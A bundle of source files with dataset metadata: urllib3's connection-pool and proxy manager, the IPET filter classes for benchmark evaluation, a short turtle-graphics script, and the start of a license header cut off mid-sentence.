Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool
from .connectionpool import port_by_scheme
from .exceptions import LocationValueError, MaxRetryError, ProxySchemeUnknown
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.url import parse_url
from .util.retry import Retry
__all__ = ['PoolManager', 'ProxyManager', 'proxy_from_url']
log = logging.getLogger(__name__)
SSL_KEYWORDS = ('key_file', 'cert_file', 'cert_reqs', 'ca_certs',
'ssl_version', 'ca_cert_dir', 'ssl_context')
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
'key_scheme', # str
'key_host', # str
'key_port', # int
'key_timeout', # int or float or Timeout
'key_retries', # int or Retry
'key_strict', # bool
'key_block', # bool
'key_source_address', # str
'key_key_file', # str
'key_cert_file', # str
'key_cert_reqs', # str
'key_ca_certs', # str
'key_ssl_version', # str
'key_ca_cert_dir', # str
'key_ssl_context', # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
'key_maxsize', # int
'key_headers', # dict
'key__proxy', # parsed proxy url
'key__proxy_headers', # dict
'key_socket_options', # list of (level (int), optname (int), value (int or str)) tuples
'key__socks_options', # dict
'key_assert_hostname', # bool or string
'key_assert_fingerprint', # str
'key_server_hostname', #str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple('PoolKey', _key_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
A dictionary-like object that contain the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context['scheme'] = context['scheme'].lower()
context['host'] = context['host'].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ('headers', '_proxy_headers', '_socks_options'):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get('socket_options')
if socket_opts is not None:
context['socket_options'] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context['key_' + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
'http': functools.partial(_default_key_normalizer, PoolKey),
'https': functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
'http': HTTPConnectionPool,
'https': HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
"""
Allows for arbitrary requests while transparently keeping track of
necessary connection pools for you.
:param num_pools:
Number of connection pools to cache before discarding the least
recently used pool.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param \\**connection_pool_kw:
Additional parameters are used to create fresh
:class:`urllib3.connectionpool.ConnectionPool` instances.
Example::
>>> manager = PoolManager(num_pools=2)
>>> r = manager.request('GET', 'http://google.com/')
>>> r = manager.request('GET', 'http://google.com/mail')
>>> r = manager.request('GET', 'http://yahoo.com/')
>>> len(manager.pools)
2
"""
proxy = None
def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
RequestMethods.__init__(self, headers)
self.connection_pool_kw = connection_pool_kw
self.pools = RecentlyUsedContainer(num_pools,
dispose_func=lambda p: p.close())
# Locally set the pool classes and keys so other PoolManagers can
# override them.
self.pool_classes_by_scheme = pool_classes_by_scheme
self.key_fn_by_scheme = key_fn_by_scheme.copy()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.clear()
# Return False to re-raise any potential exceptions
return False
def _new_pool(self, scheme, host, port, request_context=None):
"""
Create a new :class:`ConnectionPool` based on host, port, scheme, and
any additional pool keyword arguments.
If ``request_context`` is provided, it is provided as keyword arguments
to the pool class used. This method is used to actually create the
connection pools handed out by :meth:`connection_from_url` and
companion methods. It is intended to be overridden for customization.
"""
pool_cls = self.pool_classes_by_scheme[scheme]
if request_context is None:
request_context = self.connection_pool_kw.copy()
# Although the context has everything necessary to create the pool,
# this function has historically only used the scheme, host, and port
# in the positional args. When an API change is acceptable these can
# be removed.
for key in ('scheme', 'host', 'port'):
request_context.pop(key, None)
if scheme == 'http':
for kw in SSL_KEYWORDS:
request_context.pop(kw, None)
return pool_cls(host, port, **request_context)
def clear(self):
"""
Empty our store of pools and direct them all to close.
This will not affect in-flight connections, but they will not be
re-used after completion.
"""
self.pools.clear()
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
"""
Get a :class:`ConnectionPool` based on the host, port, and scheme.
If ``port`` isn't given, it will be derived from the ``scheme`` using
``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
provided, it is merged with the instance's ``connection_pool_kw``
variable and used to create the new connection pool, if one is
needed.
"""
if not host:
raise LocationValueError("No host specified.")
request_context = self._merge_pool_kwargs(pool_kwargs)
request_context['scheme'] = scheme or 'http'
if not port:
port = port_by_scheme.get(request_context['scheme'].lower(), 80)
request_context['port'] = port
request_context['host'] = host
return self.connection_from_context(request_context)
def connection_from_context(self, request_context):
"""
Get a :class:`ConnectionPool` based on the request context.
``request_context`` must at least contain the ``scheme`` key and its
value must be a key in ``key_fn_by_scheme`` instance variable.
"""
scheme = request_context['scheme'].lower()
pool_key_constructor = self.key_fn_by_scheme[scheme]
pool_key = pool_key_constructor(request_context)
return self.connection_from_pool_key(pool_key, request_context=request_context)
def connection_from_pool_key(self, pool_key, request_context=None):
"""
Get a :class:`ConnectionPool` based on the provided pool key.
``pool_key`` should be a namedtuple that only contains immutable
objects. At a minimum it must have the ``scheme``, ``host``, and
``port`` fields.
"""
with self.pools.lock:
# If the scheme, host, or port doesn't match existing open
# connections, open a new ConnectionPool.
pool = self.pools.get(pool_key)
if pool:
return pool
# Make a fresh ConnectionPool of the desired type
scheme = request_context['scheme']
host = request_context['host']
port = request_context['port']
pool = self._new_pool(scheme, host, port, request_context=request_context)
self.pools[pool_key] = pool
return pool
def connection_from_url(self, url, pool_kwargs=None):
"""
Similar to :func:`urllib3.connectionpool.connection_from_url`.
If ``pool_kwargs`` is not provided and a new pool needs to be
constructed, ``self.connection_pool_kw`` is used to initialize
the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
is provided, it is used instead. Note that if a new pool does not
need to be created for the request, the provided ``pool_kwargs`` are
not used.
"""
u = parse_url(url)
return self.connection_from_host(u.host, port=u.port, scheme=u.scheme,
pool_kwargs=pool_kwargs)
def _merge_pool_kwargs(self, override):
"""
Merge a dictionary of override values for self.connection_pool_kw.
This does not modify self.connection_pool_kw and returns a new dict.
Any keys in the override dictionary with a value of ``None`` are
removed from the merged dictionary.
"""
base_pool_kwargs = self.connection_pool_kw.copy()
if override:
for key, value in override.items():
if value is None:
try:
del base_pool_kwargs[key]
except KeyError:
pass
else:
base_pool_kwargs[key] = value
return base_pool_kwargs
def urlopen(self, method, url, redirect=True, **kw):
"""
Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`
with custom cross-host redirect logic and only sends the request-uri
portion of the ``url``.
The given ``url`` parameter must be absolute, such that an appropriate
:class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
"""
u = parse_url(url)
conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
kw['assert_same_host'] = False
kw['redirect'] = False
if 'headers' not in kw:
kw['headers'] = self.headers.copy()
if self.proxy is not None and u.scheme == "http":
response = conn.urlopen(method, url, **kw)
else:
response = conn.urlopen(method, u.request_uri, **kw)
redirect_location = redirect and response.get_redirect_location()
if not redirect_location:
return response
# Support relative URLs for redirecting.
redirect_location = urljoin(url, redirect_location)
# RFC 7231, Section 6.4.4
if response.status == 303:
method = 'GET'
retries = kw.get('retries')
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect)
# Strip headers marked as unsafe to forward to the redirected location.
# Check remove_headers_on_redirect to avoid a potential network call within
# conn.is_same_host() which may use socket.gethostbyname() in the future.
if (retries.remove_headers_on_redirect
and not conn.is_same_host(redirect_location)):
for header in retries.remove_headers_on_redirect:
kw['headers'].pop(header, None)
try:
retries = retries.increment(method, url, response=response, _pool=conn)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
kw['retries'] = retries
kw['redirect'] = redirect
log.info("Redirecting %s -> %s", url, redirect_location)
return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
"""
Behaves just like :class:`PoolManager`, but sends all requests through
the defined proxy, using the CONNECT method for HTTPS URLs.
:param proxy_url:
The URL of the proxy to be used.
:param proxy_headers:
A dictionary containing headers that will be sent to the proxy. In case
of HTTP they are being sent with each request, while in the
HTTPS/CONNECT case they are sent only once. Could be used for proxy
authentication.
Example:
>>> proxy = urllib3.ProxyManager('http://localhost:3128/')
>>> r1 = proxy.request('GET', 'http://google.com/')
>>> r2 = proxy.request('GET', 'http://httpbin.org/')
>>> len(proxy.pools)
1
>>> r3 = proxy.request('GET', 'https://httpbin.org/')
>>> r4 = proxy.request('GET', 'https://twitter.com/')
>>> len(proxy.pools)
3
"""
def __init__(self, proxy_url, num_pools=10, headers=None,
proxy_headers=None, **connection_pool_kw):
if isinstance(proxy_url, HTTPConnectionPool):
proxy_url = '%s://%s:%i' % (proxy_url.scheme, proxy_url.host,
proxy_url.port)
proxy = parse_url(proxy_url)
if not proxy.port:
port = port_by_scheme.get(proxy.scheme, 80)
proxy = proxy._replace(port=port)
if proxy.scheme not in ("http", "https"):
raise ProxySchemeUnknown(proxy.scheme)
self.proxy = proxy
self.proxy_headers = proxy_headers or {}
connection_pool_kw['_proxy'] = self.proxy
connection_pool_kw['_proxy_headers'] = self.proxy_headers
super(ProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw)
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
if scheme == "https":
return super(ProxyManager, self).connection_from_host(
host, port, scheme, pool_kwargs=pool_kwargs)
return super(ProxyManager, self).connection_from_host(
self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs)
def _set_proxy_headers(self, url, headers=None):
"""
Sets headers needed by proxies: specifically, the Accept and Host
headers. Only sets headers not provided by the user.
"""
headers_ = {'Accept': '*/*'}
netloc = parse_url(url).netloc
if netloc:
headers_['Host'] = netloc
if headers:
headers_.update(headers)
return headers_
def urlopen(self, method, url, redirect=True, **kw):
"Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
u = parse_url(url)
if u.scheme == "http":
# For proxied HTTPS requests, httplib sets the necessary headers
# on the CONNECT to the proxy. For HTTP, we'll definitely
# need to set 'Host' at the very least.
headers = kw.get('headers', self.headers)
kw['headers'] = self._set_proxy_headers(url, headers)
return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw)
def proxy_from_url(url, **kw):
return ProxyManager(proxy_url=url, **kw)
| 38.365854
| 93
| 0.626886
|
8c4792a378b1ddb48550ec9e599160ffe40c7742
| 23,991
|
py
|
Python
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 14
|
2016-12-20T06:49:32.000Z
|
2021-05-12T11:17:27.000Z
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 69
|
2016-12-15T16:37:27.000Z
|
2021-08-16T10:12:36.000Z
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 11
|
2016-12-30T07:46:18.000Z
|
2021-10-09T02:34:45.000Z
|
"""
The MIT License (MIT)
Copyright (c) 2018 Zuse Institute Berlin, www.zib.de
Permissions are granted as stated in the license file you have obtained
with this software. If you find the library useful for your purpose,
please refer to README.md for how to cite IPET.
@author: Gregor Hendel
"""
import xml.etree.ElementTree as ElementTree
import numpy as np
from ipet.concepts import IpetNode, IpetNodeAttributeError
import logging
import pandas as pd
from ipet.evaluation import TestSets
logger = logging.getLogger(__name__)
class IPETValue(IpetNode):
nodetag = "Value"
def __init__(self, name = None, active = True):
"""
constructs an Ipet Instance
Parameters
----------
name : The name of this problem
active : True or "True" if this element should be active, False otherwise
"""
super(IPETValue, self).__init__(active)
self.name = name
def checkAttributes(self):
if self.name is None:
raise IpetNodeAttributeError("name", "No name specified")
return True
def getEditableAttributes(self):
return ["name"] + super(IPETValue, self).getEditableAttributes()
@staticmethod
def getNodeTag():
return IPETValue.nodetag
def getName(self):
return self.name
def getValue(self, dtype = None):
if dtype is None:
for mytype in [int, float, str]:
try:
return mytype(self.name)
except ValueError:
continue
elif dtype != object:
return dtype.type(self.name)
return self.name
def toXMLElem(self):
me = ElementTree.Element(IPETValue.getNodeTag(), self.attributesToStringDict())
return me
class IPETComparison:
"""
comparison operators for filters. All standard binary comparisons + float comparisons (with tolerance)
+ percentage based inequality
"""
comparisondict = {
"le":"le",
"lt":"lt",
"gt":"gt",
"ge":"ge",
"eq":"eq",
"neq":"neq"
}
def __init__(self, operator):
"""
constructs a comparison object by passing an appropriate operator as string
"""
if str(operator) in IPETComparison.comparisondict:
self.operator = str(operator)
else:
raise KeyError("Unknown key value %s" % (operator))
def compare(self, x, y):
method = getattr(self, "method_" + IPETComparison.comparisondict[self.operator])
try:
return method(x, y)
except TypeError as t:
logger.error("Got type error %s comparing elements x:%s and y:%s" % (t, x, y))
return 0
def method_le(self, x, y):
return x <= y
def method_lt(self, x, y):
return x < y
def method_ge(self, x, y):
return x >= y
def method_gt(self, x, y):
return x > y
def method_eq(self, x, y):
return x == y
def method_neq(self, x, y):
return x != y
class IPETFilter(IpetNode):
"""
Filters are used for selecting subsets of problems to analyze.
"""
valueoperators = ["keep", "drop"]
listoperators = ["diff", "equal"]
attribute2Options = {
"anytestrun":["one", "all"],
"operator":list(IPETComparison.comparisondict.keys())
+valueoperators
+listoperators}
nodetag = "Filter"
DEFAULT_ANYTESTRUN = 'all'
_storedcol_ = None
_storeddf_ = None
def __init__(self, expression1 = None, expression2 = None, operator = "ge", anytestrun = DEFAULT_ANYTESTRUN, active = True, datakey = None):
"""
filter constructor
Parameters
----------
expression1 : integer, float, string, or column name
expression2 : integer, float, string, or column name
datakey : available data key for drop and keep filters
operator : operator such that evaluation expression1 op expression2 yields True or False
anytestrun : either 'one' or 'all'
active : True or "True" if this filter should be active, False otherwise
"""
super(IPETFilter, self).__init__(active)
self.expression1 = expression1
self.expression2 = expression2
self.anytestrun = anytestrun
self.values = []
self._updatevalueset = False
self.set_operator(operator)
self.datakey = datakey
def checkAttributes(self):
if self.operator in self.valueoperators and self.values == []:
raise IpetNodeAttributeError("operator", "Trying to use a filter with operator {0} and empty value set".format(self.operator))
if self.operator in self.valueoperators and self.datakey is None or self.datakey == "":
raise IpetNodeAttributeError("datakey", "Trying to use a filter with operator '{}' and unspecified data key '{}'".format(self.operator, self.datakey))
if self.anytestrun not in self.attribute2Options["anytestrun"]:
raise IpetNodeAttributeError("anytestrun", "Wrong attribute {} passed as 'anytestrun' property. Should be in {}".format(self.anytestrun, self.attribute2Options["anytestrun"]))
return True
@staticmethod
def fromDict(attrdict):
expression1 = attrdict.get('expression1')
expression2 = attrdict.get('expression2')
anytestrun = attrdict.get('anytestrun', IPETFilter.DEFAULT_ANYTESTRUN)
operator = attrdict.get('operator')
datakey = attrdict.get('datakey')
active = attrdict.get('active', True)
return IPETFilter(expression1, expression2, operator, anytestrun, active, datakey)
@staticmethod
def processXMLElem(elem):
"""
inspect and process an xml element
"""
elemdict = dict(elem.attrib)
# filter_ must be written with a trailing underscore "_" not to conflict with the filter method of Python
filter_ = IPETFilter.fromDict(elemdict)
# add values one by one
for child in elem:
# catch wrong children
if not child.tag == IPETValue.getNodeTag():
raise AttributeError("Cannot add a child of type {} to a Filter".format(child.tag))
instancename = child.attrib.get("name")
if instancename:
filter_.addChild(IPETValue(instancename))
# check the filter attributes
filter_.checkAttributes()
return filter_
def getName(self):
prefix = self.anytestrun
if self.operator in self.valueoperators:
return "{} value filter (key: {})".format(self.operator, self.datakey)
elif self.operator in self.listoperators:
return "{}-{} list filter (key: {})".format(self.anytestrun, self.operator, self.datakey)
else:
return " ".join(map(str, (prefix, self.expression1, self.operator, self.expression2)))
def set_operator(self, operator):
self.operator = operator
if self.operator in list(IPETComparison.comparisondict.keys()):
self.comparison = IPETComparison(self.operator)
def getEditableAttributes(self):
"""
returns editable attributes depending on the selected operator
if a binary operator is selected, two expressions as left and right hand side of operator must be chosen
For problem operators, no expressions are selectable.
"""
parenteditables = super(IPETFilter, self).getEditableAttributes()
if self.operator in list(IPETComparison.comparisondict.keys()):
return parenteditables + ['operator', 'anytestrun', 'expression1', 'expression2']
else:
return parenteditables + ['operator', 'anytestrun', 'datakey']
@staticmethod
def getNodeTag():
return IPETFilter.nodetag
def getChildren(self):
return self.values
def acceptsAsChild(self, child):
return child.__class__ is IPETValue
def addChild(self, child):
self.values.append(child)
self._updatevalueset = True
def removeChild(self, child):
self.values.remove(child)
self._updatevalueset = True
def getActiveValues(self):
return [x for x in self.values if x.isActive()]
def getRequiredOptionsByAttribute(self, attr):
return self.attribute2Options.get(attr, super(IPETFilter, self).getRequiredOptionsByAttribute(attr))
def checkAndUpdateValueSet(self, dtype = None):
"""Update the value set of this filter if necessary
"""
if not self._updatevalueset:
return
self.valueset = set([x.getValue(dtype) for x in self.getActiveValues()])
updateset = set()
#
# check for test set names among the values
#
for i in self.valueset:
if i in TestSets.getTestSets():
logger.debug("Adding test set {} to value set".format(i))
updateset = updateset.union(set(TestSets.getTestSetByName(i)))
self.valueset = self.valueset.union(updateset)
logger.debug("Complete value set of filter {}:\n{}".format(self.getName(), self.valueset))
self._updatevalueset = False
def applyValueOperator(self, df):
dtype = df.dtypes[0]
self.checkAndUpdateValueSet(dtype)
contained = df.isin(self.valueset)
logger.debug("Contained: {}\nData: {}".format(contained, df))
if self.operator == "keep":
return contained
else:
return ~contained
def isAllDiff(self, x):
valueset = set()
for x_i in x:
if x_i in valueset:
return False
valueset.add(x_i)
return True
def isOneEqual(self, x):
return not self.isAllDiff(x)
def isAllEqual(self, x):
first_x = x.iloc[0]
for x_i in x:
if first_x != x_i:
return False
return True
def isOneDiff(self, x):
return not self.isAllEqual(x)
def applyListOperator(self, df, groupindex):
"""
Apply list operators 'diff' and 'equal' to the datakey.
In combination with the 'anytestrun' attribute, there are
four possibilities in total:
| anytestrun | operator | result |
|------------|----------|--------|
| one |diff |True, if there are at least 2 different values in a group |
| all |diff |True, if all values are different in this group |
| one |equal |True, if at least one value occurs twice in a group |
| all |equal |True, if there is only a single value for this group |
"""
#
# 1. chose the right list function
#
if self.operator == "diff":
if self.anytestrun == "one":
fun = self.isOneDiff
else:
fun = self.isAllDiff
if self.operator == "equal":
if self.anytestrun == "one":
fun = self.isOneEqual
else:
fun = self.isAllEqual
#
# 2. store the original index
#
dfindex = df.set_index(groupindex).index
#
# 3. group by the index and apply the list function
#
f_by_group = df.groupby(groupindex)[self.datakey].apply(fun)
#
# 4. reindex the result to match the original data frame row count
#
f_by_group_as_frame = pd.DataFrame(f_by_group.reindex(index = dfindex, axis = 0))
#
# 5. set the index of the frame to match the original frame's index
#
f_by_group_as_frame.set_index(df.index, inplace = True)
return f_by_group_as_frame
def filterProblem(self, probname, testruns = []):
"""
return True or False depending on the evaluation of the filter operator comparison
"""
# apply an problem operator directly
if self.operator in self.valueoperators:
return self.applyValueOperator(probname)
# evaluate the two expressions and filter according to the anytestrun attribute if one or all match the requirement
for testrun in testruns:
x = self.evaluate(self.expression1, probname, testrun)
y = self.evaluate(self.expression2, probname, testrun)
if self.anytestrun == 'one' and self.comparison.compare(x, y):
return True
elif self.anytestrun == 'all' and not self.comparison.compare(x, y):
return False
if self.anytestrun == 'one':
return False
return True
def storeResult(self, df : pd.DataFrame, filtercol : pd.Series):
"""store a filter result for future reuse
"""
self._storeddf_ = df
self._storedcol_ = filtercol
def getStoredResult(self, df : pd.DataFrame):
"""return the already stored result for this data frame
"""
if self._storeddf_ is df:
return self._storedcol_
else:
return None
def applyFilter(self, df, groupindex = None):
"""Apply the filter to a data frame rowwise
Parameters
----------
df : DataFrame
data frame object containing columns 'expression1' and 'expression2' or 'datakey'
depending on the selected operator
groupindex : list or None
either a list of columns that should be used for groupby operations
(only needed for list operators 'equal' and 'diff')
Returns
-------
booleanseries :
"""
if self.operator in self.listoperators:
filtercol = self.applyListOperator(df, groupindex)
elif self.operator in self.valueoperators:
filtercol = self.applyValueOperator(df[[self.datakey]])
else:
x = self.evaluateValueDataFrame(df, self.expression1)
y = self.evaluateValueDataFrame(df, self.expression2)
try:
x.columns = ["comp"]
except:
pass
try:
y.columns = ["comp"]
except:
pass
filtercol = self.comparison.compare(x, y)
if groupindex is None:
return filtercol
dfindex = df.set_index(groupindex).index
renaming = {i:"{}_filter".format(i) for i in groupindex}
filtercol = filtercol.rename(renaming, axis = 1)
filtercol.index = dfindex
# group the filter by the specified data frame index columns.
if self.anytestrun == "one":
func = np.any
elif self.anytestrun == "all":
func = np.all
fcol_index = filtercol.groupby(filtercol.index).apply(func)
#
# reshape the column to match the original data frame rows
#
fcol = fcol_index.reindex(index = dfindex, axis = 0)
return fcol
def getNeededColumns(self, df):
return [exp for exp in [self.expression1, self.expression2, self.datakey] if exp in df.columns]
def evaluateValueDataFrame(self, df, value):
if value in df.columns:
return df[[value]]
else:
for conversion in [int, float, str]:
try:
return conversion(value)
except ValueError:
pass
return value
def evaluate(self, value, probname, testrun):
if value in testrun.getKeySet():
return testrun.getProblemDataById(probname, value)
else:
for conversion in [int, float, str]:
try:
return conversion(value)
except ValueError:
pass
return value
def filterProblems(self, probnames, testruns = []):
return [self.filterProblem(probname, testruns) for probname in probnames]
def getFilteredList(self, probnames, testruns = []):
return [probname for probname in probnames if self.filterProblem(probname, testruns)]
def toXMLElem(self):
me = ElementTree.Element(IPETFilter.getNodeTag(), self.attributesToStringDict())
for value in self.values:
me.append(value.toXMLElem())
return me
def getDependency(self, i):
if i == 1:
value = self.expression1
else:
value = self.expression2
try:
float(value)
except:
return value
return None
def equals(self, other):
"""Compare this and another filter for equality
"""
if not IpetNode.equals(self, other):
return False
if self.operator == other.operator:
if self.operator not in IPETFilter.valueoperators:
return True
if len(self.values) != len(other.values):
return False
for v1, v2 in zip(self.values, other.values):
if not v1.equals(v2):
return False
return True
class IPETFilterGroup(IpetNode):
"""
represents a list of filters, has a name attribute for quick tabular representation
a filter group collects
"""
nodetag = "FilterGroup"
attribute2options = {"filtertype":["union", "intersection"]}
editableAttributes = ["name", "filtertype"]
# global data frame and index that are reused for several filter groups
_glbdf_ = None
_glbindex_ = None
# intersection row index which can be shared across all filter groups of type "intersection"
_glbinterrows_ = None
def __init__(self, name = None, filtertype = "intersection", active = True):
"""
constructor for a filter group
Parameters:
----------
name : a suitable name for the filter group
filtertype : either 'union' or 'intersection'
active : True or "True" if this filter group should be active, False otherwise
"""
super(IPETFilterGroup, self).__init__(active)
self.name = name
self.filters = []
if filtertype not in ["intersection", "union"]:
raise ValueError("Error: filtertype <%s> must be either 'intersection' or 'union'" % filtertype)
self.filtertype = filtertype
def getEditableAttributes(self):
return super(IPETFilterGroup, self).getEditableAttributes() + self.editableAttributes
def getChildren(self):
return self.filters
def addChild(self, child):
self.addFilter(child)
def acceptsAsChild(self, child):
return child.__class__ is IPETFilter
def removeChild(self, child):
self.filters.remove(child)
@staticmethod
def getNodeTag():
return IPETFilterGroup.nodetag
def getRequiredOptionsByAttribute(self, attr):
return self.attribute2options.get(attr, super(IPETFilterGroup, self).getRequiredOptionsByAttribute(attr))
def addFilter(self, filter_):
"""
add a filter to the list of filters.
Parameters
----------
filter_ : an problem of IPETFilter
"""
self.filters.append(filter_)
def getName(self):
return self.name
def getActiveFilters(self):
return [f for f in self.filters if f.isActive()]
@staticmethod
def setGlobalDataFrameAndIndex(df : pd.DataFrame, index):
"""Set global data frame and index for filtering, that will be reused by each filter group
"""
IPETFilterGroup._glbdf_ = df
IPETFilterGroup._glbindex_ = index
IPETFilterGroup._glbinterrows_ = IPETFilterGroup.computeIntersectionRows(df, index)
@staticmethod
def computeIntersectionRows(df : pd.DataFrame, index):
"""Compute intersection rows of a given data frame and index
Intersection rows denote a boolean index to define the subset of rows of the input frame
considered as "intersection" for filter groups that have the "intersection" type (which is the default).
The intersection row computation is slow and is reused across all
filter groups with the intersection type.
"""
logger.info("Computing rows for intersection groups")
dfindex = df.set_index(index).index
groups = df.groupby(index)
instancecount = groups.apply(len).max()
interrows = groups.apply(lambda x:len(x) == instancecount)
return interrows.reindex(dfindex)
def filterDataFrame(self, df, index):
"""
filters a data frame object as the intersection of all values that match the criteria defined by the filters
"""
activefilters = self.getActiveFilters()
# treat the special case to keep everything quickly
if len(activefilters) == 0 and self.filtertype == "union":
return df
# first, get the highest number of index occurrences. This number must be matched to keep the problem
if self.filtertype == "intersection":
if df is IPETFilterGroup._glbdf_:
intersection_index = IPETFilterGroup._glbinterrows_
else:
intersection_index = IPETFilterGroup.computeIntersectionRows(df, index)
elif self.filtertype == "union":
intersection_index = None
for f_ in activefilters:
# check first if the column has already been stored
storedcol = f_.getStoredResult(df)
if storedcol is not None:
fcol = storedcol
else:
# apply the filter to the data frame rowwise and store the result in a temporary boolean column
fcol = f_.applyFilter(df, index)
if intersection_index is not None:
intersection_index = intersection_index & fcol
else:
intersection_index = fcol
#
# aggregate the single, elementwise filters into a single intersection
# series with one row per index element
#
# intersection_index = pd.concat(index_series, axis = 1).apply(np.all, axis = 1)
lvalues = intersection_index.values
return lvalues
def filterProblem(self, probname, testruns = []):
for filter_ in self.getActiveFilters():
if not filter_.filterProblem(probname, testruns):
return False
return True
def getNeededColumns(self, df):
needed = []
for filter_ in self.filters:
needed += filter_.getNeededColumns(df)
return needed
def toXMLElem(self):
me = ElementTree.Element('FilterGroup', self.attributesToStringDict())
for filter_ in self.filters:
me.append(filter_.toXMLElem())
return me
@staticmethod
def processXMLElem(elem):
"""
inspect and process an xml element
"""
if elem.tag == IPETFilterGroup.getNodeTag():
filtergroup = IPETFilterGroup(**elem.attrib)
for child in elem:
filtergroup.addFilter(IPETFilterGroup.processXMLElem(child))
return filtergroup
elif elem.tag == IPETFilter.getNodeTag():
return IPETFilter.processXMLElem(elem)
@staticmethod
def fromXML(xmlstring):
"""
parse an xml string matching the filter group XML syntax
"""
tree = ElementTree.fromstring(xmlstring)
return IPETFilterGroup.processXMLElem(tree)
@staticmethod
def fromXMLFile(xmlfilename):
"""
parse a file containing an xml string matching the filter group XML representation syntax
"""
tree = ElementTree.parse(xmlfilename)
return IPETFilterGroup.processXMLElem(tree.getroot())
| 32.909465
| 187
| 0.605852
|
cec70524cb9b90ca20f49ec70b6193209fc3e3fb
| 184
|
py
|
Python
|
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | null | null | null |
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | null | null | null |
turtle/exemplo turtle.py
|
LC-ardovino/INFNET
|
3c485f122820f549f6a3c315fe09a537411bea7c
|
[
"MIT"
] | 1
|
2022-03-31T11:47:02.000Z
|
2022-03-31T11:47:02.000Z
|
import turtle
turtle.title("Bem vindo ao curso de desenvolvimento python!")
turtle.shape("turtle")
distancia = int(input("Digite a distância da tartaruga:"))
turtle.forward(distancia)
| 30.666667
| 61
| 0.782609
|
1c28da05f18750e69a4499fd9b9574f15d267cee
| 1,726
|
py
|
Python
|
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
src/primaires/objet/types/clef.py
|
stormi/tsunami
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
[
"BSD-3-Clause"
] | null | null | null |
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
